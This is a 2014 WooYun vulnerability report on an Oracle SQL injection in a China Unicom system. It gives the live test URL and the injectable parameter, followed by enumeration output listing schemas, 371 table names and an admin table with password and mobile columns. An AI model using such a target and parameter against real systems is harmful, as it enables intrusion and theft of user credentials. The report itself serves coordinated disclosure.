漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-074813
漏洞标题:中国联通某系统数据泄露(oracle字符型注射)
相关厂商:中国联通
漏洞作者: diguoji
提交时间:2014-09-03 09:52
修复时间:2014-10-18 09:54
公开时间:2014-10-18 09:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-03: 细节已通知厂商并且等待厂商处理中
2014-09-08: 厂商已经确认,细节仅向厂商公开
2014-09-18: 细节向核心白帽子及相关领域专家公开
2014-09-28: 细节向普通白帽子公开
2014-10-08: 细节向实习白帽子公开
2014-10-18: 细节向公众公开
简要描述:
当前库371张表 可夸库 oracle注射
详细说明:
测试URL http://123.125.99.115//getSource.jsp?bq_name=-1
漏洞证明:
available databases [8]:
[*] BQDX
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] ZXPT
current schema (equivalent to database on Oracle): 'BQDX'
Database: BQDX
[371 tables]
+--------------------------------+
| ADDRESS_BAK |
| ADDRESS_GROUP |
| ADDRESS_GROUP_BAK |
| ADDRESS_GROUP_DQDX |
| ADDRESS_GROUP_DXHZ |
| ADDRESS_GROUP_DXQM |
| ADDRESS_LIST |
| ADDRESS_LIST_BAK |
| ADDRESS_LIST_BJHZ |
| ADDRESS_LIST_DQDX |
| ADDRESS_LIST_DXQM |
| ADDRESS_TEMP |
| ALERT_LOG |
| ALERT_LOG_DISK |
| BOOK_ERR_MO_ALL |
| BOOK_ERR_MO_FX |
| BOOK_ERR_MO_FX20100621 |
| BOOK_ERR_MO_FX_LOG |
| BOOK_SHIELD |
| BOOK_WZ_HMD |
| BOOK_WZ_TACL |
| BOOK_WZ_TSLX |
| BOOK_WZ_YQLX |
| BQDX_WBQM_COMFIG |
| BQ_THREE_TYPE |
| BRANCHOFFICE_INFO |
| DEPARTMENT_ADDRESS_LIST |
| DEPARTMENT_ADMIN |
| DEPARTMENT_DEAL_LOG |
| DEPARTMENT_LOG |
| DEPARTMENT_MENU |
| DEPARTMENT_ROLE |
| DISK_INFO |
| DXCC_FILTER_TIME |
| DXCC_PRIVATE |
| DXCC_SMS_SEARCH |
| DXCC_USER_BLACKLIST |
| DXFHQ |
| DXFHQ_FILTER_TIME |
| DXFHQ_FILTER_WORD |
| DXFHQ_SMS_FIRE |
| DXFHQ_SPECIAL_NUM |
| DXFHQ_USER_BLACKLIST |
| DXHY_CONTENT |
| DXHY_GROUP |
| DXHY_GROUP_CONTENT |
| DXHY_LINKMAN |
| DXHY_LXR_CONTENT |
| DXHY_PRIVATE |
| DXHY_STATE |
| DXHZ_SUBMIT_EXT |
| DXQM_CONTENT |
| DXQM_GROUP |
| DXQM_LINKMAN |
| DXQM_PRIVATE |
| DXQM_WEIBO_GBHISTORY |
| DXZY_FILTER |
| DXZY_PRIVATE |
| DXZY_SMS |
| EMP_CONTACT |
| EMP_EPBASE_INFO |
| EMP_ERROR_MESSAGE |
| EMP_GJZ_FILTER |
| EMP_MEDIA_DXQM |
| EMP_PKGSER_INOUT |
| EMP_PKGSER_SELECT |
| EMP_SEND_PWD |
| EMP_SEND_PWD_LOG |
| EMP_SEND_PWD_REPORT |
| EMP_SSI_PROCESS_LOG |
| EMP_SSI_PROCESS_LOG_0209 |
| EMP_SSI_PROCESS_LOG_AUTOBAK |
| EMP_SSI_PROCESS_LOG_BAK |
| EMP_SSI_PROCESS_LOG_NEW |
| EMP_USERORDER_INFO |
| EMP_USER_INFOR_ZC |
| EMP_USER_INFOR_ZX |
| EMP_USER_SHIELD |
| EMP_WEIBO_URL |
| EMP_YJDR_GL |
| E_CALENDAR |
| E_CALENDAR_ADMIN |
| E_CLASS |
| E_COLLECTION |
| E_KNOWLEDGE |
| E_MOBILE |
| E_NOTICE |
| E_NOTICE_MATH |
| E_REPLY |
| E_SPACE_ARTICLE |
| E_SPACE_COMMENT |
| FILTER_TIME |
| FILTER_WORD |
| GROUP_DEPARTMENT_INFO |
| HEADOFFICE_INFO |
| HLJ_TYYH |
| HZNUM_DXHZ |
| INTERFACE_PROGRAM |
| INTERFACE_PROGRAM_CONFIG |
| JG_HFY |
| JG_LOGOUSER_TYPE |
| JG_MT_FEE_COUNT_HJ |
| JG_MT_FEE_COUNT_MX |
| JG_MT_FEE_COUNT_PC |
| JG_MT_FEE_ROLE |
| JG_MT_FEE_SPEC_TEMP |
| JIERI |
| JIERI_BQ |
| JIFEN_MESSAGE_PROCESS1 |
| JIFEN_MESSAGE_PROCESS1_RONG |
| JIFEN_MESSAGE_PROCESS1_TMP |
| JIFEN_MESSAGE_PROCESS1_TMP_BAK |
| JIFEN_MESSAGE_PROCESS2 |
| JIFEN_MESSAGE_PROCESS20623 |
| JIFEN_MESSAGE_PROCESS20623_END |
| JIFEN_PROCESS_BAK_ZY |
| JIXI_PINGBI |
| LNBQDX_USER |
| LNBQDX_USER_0616_ZY |
| MESSAGE_PUSH |
| MESSAGE_PUSH_LOG |
| MOBILE_0520 |
| MOBILE_0520_LY |
| MOBILE_HD0513 |
| MSG_ZF |
| MSG_ZF_DETAIL |
| PASSWORDFIND |
| PRIVATE_BQDX |
| PRIVATE_DXCC |
| PRIVATE_DXFHQ |
| PRIVATE_DXHZ |
| PRIVATE_DXQM |
| PRIVATE_DXZY |
| PRIVATE_KHTXL |
| PRIVATE_QYTXL |
| PRIVATE_USER |
| PRIVATE_ZDHF |
| PRODUCT_ANSWERCP |
| PRODUCT_INFOCP |
| QMWB_ACTIVATE_SENDWB |
| QMWX_BASIC_USER_40 |
| QMWX_BASIC_USER_40_LOG |
| REPLIESLANGUAGE |
| SDYY_DGTD |
| SDYY_DGTD_TYPE |
| SDYY_SPLENDIDSMS |
| SDYY_WZ_GG |
| SDYY_WZ_HBD |
| SDYY_WZ_HBDLX |
| SDYY_WZ_HDYJ |
| SDYY_WZ_HMD |
| SDYY_WZ_LOG |
| SDYY_WZ_MANAGE |
| SDYY_WZ_MENU |
| SDYY_WZ_MENU20100422 |
| SDYY_WZ_MOBILE |
| SDYY_WZ_NET |
| SDYY_WZ_PRO |
| SDYY_WZ_QD |
| SDYY_WZ_QDLX |
| SDYY_WZ_ROLE |
| SDYY_WZ_YWLX |
| SDYY_WZ_YWXX |
| SDYY_WZ_YW_YXCJ |
| SDY_BQDX_DS_TP |
| SDY_EMP_ALLRW_CL |
| SDY_EMP_AREA |
| SDY_EMP_AREA_BAK |
| SDY_EMP_BQ |
| SDY_EMP_BQ1 |
| SDY_EMP_BQ20100424 |
| SDY_EMP_BQ20100615 |
| SDY_EMP_BQCJ |
| SDY_EMP_BQDY |
| SDY_EMP_BQDY_SHTG |
| SDY_EMP_BQFS |
| SDY_EMP_BQFS_LOG |
| SDY_EMP_BQGJZ |
| SDY_EMP_BQGJZ1 |
| SDY_EMP_BQGJZ_BAK_ZY_20100420 |
| SDY_EMP_BQGZ |
| SDY_EMP_BQLY |
| SDY_EMP_BQPL |
| SDY_EMP_BQPP |
| SDY_EMP_BQSC |
| SDY_EMP_BQTYPE |
| SDY_EMP_BQXSD |
| SDY_EMP_BQ_BAK |
| SDY_EMP_CALLBOARD |
| SDY_EMP_CITY |
| SDY_EMP_CL |
| SDY_EMP_COLL |
| SDY_EMP_COLL_LOG |
| SDY_EMP_CONTENT_LIB |
| SDY_EMP_CWTYPE |
| SDY_EMP_CX |
| SDY_EMP_DQDYLOG |
| SDY_EMP_DSH |
| SDY_EMP_DSH_SHTG |
| SDY_EMP_DS_ALLSH |
| SDY_EMP_DXFS |
| SDY_EMP_FRIEND |
| SDY_EMP_FRIEND_LOG |
| SDY_EMP_GJZ |
| SDY_EMP_GJZCD |
| SDY_EMP_GJZFD |
| SDY_EMP_GROUP |
| SDY_EMP_GROUPBQ |
| SDY_EMP_JFGZ |
| SDY_EMP_JP |
| SDY_EMP_JP_FF |
| SDY_EMP_LEVEL |
| SDY_EMP_LOG |
| SDY_EMP_LS |
| SDY_EMP_LS20100628_1 |
| SDY_EMP_MAIL |
| SDY_EMP_MATCH |
| SDY_EMP_NSH |
| SDY_EMP_OPLOG |
| SDY_EMP_PLAN |
| SDY_EMP_PM |
| SDY_EMP_PM_CS |
| SDY_EMP_PM_LOG |
| SDY_EMP_PROVINCE |
| SDY_EMP_QF |
| SDY_EMP_QFCITY |
| SDY_EMP_QFTJ |
| SDY_EMP_QF_ZY_TEMP |
| SDY_EMP_QUESTION |
| SDY_EMP_ROLE |
| SDY_EMP_RW |
| SDY_EMP_RWTYPE |
| SDY_EMP_RWYWC |
| SDY_EMP_RW_LQ |
| SDY_EMP_SJSP |
| SDY_EMP_TALK |
| SDY_EMP_TCYH |
| SDY_EMP_TY |
| SDY_EMP_TYBQ |
| SDY_EMP_UPDATE |
| SDY_EMP_USERDT |
| SDY_EMP_USERINFO |
| SDY_EMP_USERINFO20100628 |
| SDY_EMP_USERINFO20100628_1 |
| SDY_EMP_USERINFO_FWG |
| SDY_EMP_USERINFO_LS_OLD |
| SDY_EMP_USERLY |
| SDY_EMP_USERRW |
| SDY_EMP_USERRW_LOG |
| SDY_EMP_USERTYPE |
| SDY_EMP_USERYW |
| SDY_EMP_USERZX |
| SDY_EMP_USER_LS |
| SDY_EMP_WRITE |
| SDY_EMP_WTJD |
| SDY_EMP_WZ |
| SDY_EMP_WZCC |
| SDY_EMP_XCY |
| SDY_EMP_XZ |
| SDY_EMP_YGPP |
| SDY_EMP_YHCH |
| SDY_EMP_YHCH_LOG |
| SDY_EMP_YHCH_SHTG |
| SDY_EMP_YW |
| SDY_EMP_YXJ |
| SDY_EMP_ZDYFS |
| SDY_EMP_ZS |
| SDY_HELPCONTENT |
| SDY_WZ_CJP |
| SDY_WZ_JDTJ_COUNT |
| SDY_WZ_MYFRIEND |
| SDY_WZ_MYQUNFRIEND |
| SDY_WZ_QUN |
| SDY_WZ_SR_COUNT |
| SDY_WZ_SXXXX_COUNT |
| SDY_WZ_SX_COUNT |
| SDY_WZ_SX_COUNT_FZ |
| SDY_WZ_XX_COUNT |
| SDY_WZ_XX_COUNT20100516 |
| SDY_WZ_XX_COUNT_FZ |
| SDY_WZ_XX_COUNT_ZHI |
| SDY_WZ_YHZX_COUNT |
| SDY_WZ_YTJ_COUNT |
| SDY_WZ_YWFG_COUNT |
| SDY_WZ_YWFG_COUNT20100516 |
| SDY_WZ_YWSY_COUNT |
| SERPKGBASE_INFO |
| SERVICE_SYNC_LOG |
| SERVICE_SYNC_SERVER |
| SGIP_MO_LOG |
| SGIP_MT |
| SGIP_MT_FEE |
| SGIP_MT_FEEL |
| SGIP_MT_LOG |
| SGIP_MT_REPORT |
| SHOR_URL |
| SMS_BQDX_BROWSE |
| SMS_BQDX_KU |
| SMS_BQDX_SUM |
| SMS_BQDX_USER |
| SMS_CONFIG |
| SMS_DXCC_BROWSE |
| SMS_DXCC_LAB |
| SMS_DXCC_LABL |
| SMS_DXCC_LABLX |
| SMS_DXCC_SUM |
| SMS_DXHZ |
| SMS_DXHZ_CONTENT |
| SMS_DXQM |
| SMS_DXZY |
| SMS_FIRE |
| SMS_MFTY_LAB |
| SMS_MFTY_LABLX |
| SMS_MOBLIE_NO |
| SMS_ORDER_USERINFO |
| SMS_RECORD_LOG |
| SMS_SEARCH |
| SMS_SECTIONNO |
| SMS_SECTIONNO_ERR |
| SMS_USERINFO |
| SMS_USERINFO_LOG |
| SMS_USERINFO_TYPE |
| SMS_USERINFO_TYPE_ZX |
| SM_HB_0615 |
| SM_HB_0615_15_50 |
| SM_HB_0615_50UP |
| SM_HB_0615_MGYH |
| SYSTEM_INFO |
| SYSTEM_INFO_ERRDESC |
| TABLES0614 |
| TABLE_INFO_TEST |
| TABLE_NAME_TEMP_ZY |
| TABLE_SPACE_INFO |
| TEMP1 |
| TEMP2 |
| TEST_BACKUP |
| TEST_BACKUP_BAK |
| TIAOJIANBIAO |
| TONGYONG_BQ |
| UPLOADFILE |
| USERNAME |
| USER_BLACKLIST |
| USER_INFO |
| USER_IPHONEORANDRIO |
| USER_IPHONEORANDRIO_BAK |
| USER_ORDER_INFO |
| USER_PHONE_REGISTER |
| YAN_0520 |
| YBYAA |
| YBY_0509 |
| YBY_0614BD |
| YBY_0614GW |
| YBY_HEIHE0903 |
| YBY_JMSPP0107 |
| YBY_QQHE3000 |
| YBY_SHTIYAN3000 |
| YBY_ZTYW1122 |
| ZDYD_HOLIDAY_CONFIG |
| ZDYD_REPLY_CONTENT |
| ZDYD_REPLY_COUNT |
| ZDYD_SCENE_TYPE |
| ZDYD_USER_CONFIG |
| ZDYD_USER_CONFIG_EL |
| ZDYD_USER_SENCE |
| ZXPT_JCXX_TYPEATT |
| ZXPT_JXCC_TYPEATT |
| ZXPT_MFTY_BQDX |
| ZZZ_JIFEN_PROCESS10623FX_END |
| ZZZ_USER_HF_0623_FX_WC |
| ZZ_WANGCHANG_71 |
| ZZ_WANGCHAO_HF |
+--------------------------------+
Database: BQDX
Table: DEPARTMENT_ADMIN
[13 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| BRANCHID | NUMBER |
| C_CREATEUSER | VARCHAR2 |
| C_DEL_FLAG | VARCHAR2 |
| C_MOBILE | VARCHAR2 |
| C_NAME | VARCHAR2 |
| C_PASSWORD | VARCHAR2 |
| C_SUMMARY | VARCHAR2 |
| C_USERTYPE | VARCHAR2 |
| D_DATE | VARCHAR2 |
| DAPARTID | NUMBER |
| N_HEADOFFICE_ID | NUMBER |
| N_ID | NUMBER |
| N_TYPE | NUMBER |
+-----------------+----------+
Database: CTXSYS
[3 tables]
+---------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
+---------------------+
Database: EXFSYS
[1 table]
+----------------+
| RLM$PARSEDCOND |
+----------------+
Database: MDSYS
[37 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_ST_TOLERANCE |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
+--------------------------------+
Database: OLAPSYS
[2 tables]
+--------------------+
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
修复方案:
版权声明:转载请注明来源 diguoji@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2014-09-08 09:33
厂商回复:
最新状态:
暂无